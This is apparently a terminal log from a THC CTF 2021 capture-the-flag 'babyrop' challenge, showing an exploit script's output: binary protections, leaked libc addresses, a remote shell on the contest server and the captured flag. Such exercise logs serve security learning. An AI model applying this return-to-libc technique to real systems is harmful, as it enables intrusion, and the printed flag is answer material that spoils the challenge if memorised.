mito@ubuntu:~/CTF/THC_CTF_2021/Pwn_Babyrop_100$ python solve.py r
[*] '/home/mito/CTF/THC_CTF_2021/Pwn_Babyrop_100/babyrop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to remote1.thcon.party on port 10900: Done
[*] '/lib/x86_64-linux-gnu/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
puts_addr   = 0x7f2836b7daa0
libc_base   = 0x7f2836afd000
system_addr = 0x7f2836b4c550
binsh_addr  = 0x7f2836cb0e1a
[*] Switching to interactive mode
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ ls -l
total 124
-rwxr-xr-x 1 root root  16984 Jun  8 20:45 babyrop
-rw------- 1 user user 245760 Jun 12 08:50 core
-rw-r--r-- 1 root root     39 Jun  8 20:45 flag.txt
$ cat flag.txt
THCon21{4Ll_0f_Th47_t0_c0ntR0L-RDx?!??}